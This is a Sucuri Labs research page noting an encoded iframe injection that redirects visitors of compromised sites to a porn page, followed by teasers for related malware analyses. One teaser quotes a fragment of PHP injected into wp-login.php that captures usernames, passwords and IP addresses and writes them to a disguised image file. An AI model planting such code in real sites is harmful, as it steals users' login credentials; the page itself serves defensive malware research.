Sucuri Labs

One way of hidding an iframe

There are multiple ways to inject an iframe on a web site, and every day we found a new evasion technique to make it harder to detect it. This is a new one found by Fio:

It uses many encondings to just load this iframe:

Which redirects the user visitng a compromised site to a porn page.

Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Related Tags

Labs Note

Magento PHP Injection Loads JavaScript Skimmer

Luke Leal
January 21, 2021

A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP…

Read the Post

Simple WP login stealer

Luke Leal
July 28, 2019

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…

Read the Post

WebSockets, Viagra and Fake CloudFlare CDN

Fernando Barbosa
April 3, 2017

Recently we’ve seen some WordPress websites displaying unwanted banners at the bottom of the page which appear 15 seconds after browsing the website. Those banners…

Read the Post

Fake WordPress Plugin SiteSpeed Hosts Malicious Ads & Backdoors

Smoker Backdoor: Evasion Techniques in Webshell Backdoors

Luke Leal
August 13, 2020

“Smoker Backdoor” is a PHP webshell backdoor that uses hexadecimal and decimal obfuscation in conjunction with the PHP function goto to evade detection from malware…

Read the Post

Backdoor Shell Dropper Deploys CMS-Specific Malware

Krasimir Konov
October 6, 2020

A large majority of the malware we find on compromised websites are backdoors that allow an attacker to maintain unauthorized access to the site and…

Read the Post

Hydro-Quebec phishing

Luke Leal
August 7, 2019

We have found an interesting phishing kit containing numerous phishing pages which target large, popular brands like Amazon and Paypal. What was interesting about this…

Read the Post

Fake Google Analytics tracking code leading to Adware

John Castro
January 31, 2017

Our Incident Response process makes sure we remove all malicious files and other small pieces of code inserted in good files that could be used…

Read the Post

WordPress Admin Login Stealer

Krasimir Konov
April 27, 2020

During an investigation, we identified a WordPress login stealer using the PHP functions curl and file_get_contents. The malicious code was injected into the core file…

Read the Post

Hardening WordPress on Apache, Nginx, or IIS

Alycia Mitchell
July 23, 2018

Server configuration files allow administrators to restrict access and make changes at the server level. Depending on the server software you use, there are different…

Read the Post

Soccer spam. Really?

Fernando Barbosa
September 21, 2017

In the last few months, we’ve covered several cases of SEO Spam in our labs and blog that were promoting products and services ranging from…

Read the Post

Related Tags

Related Categories

You May Also Like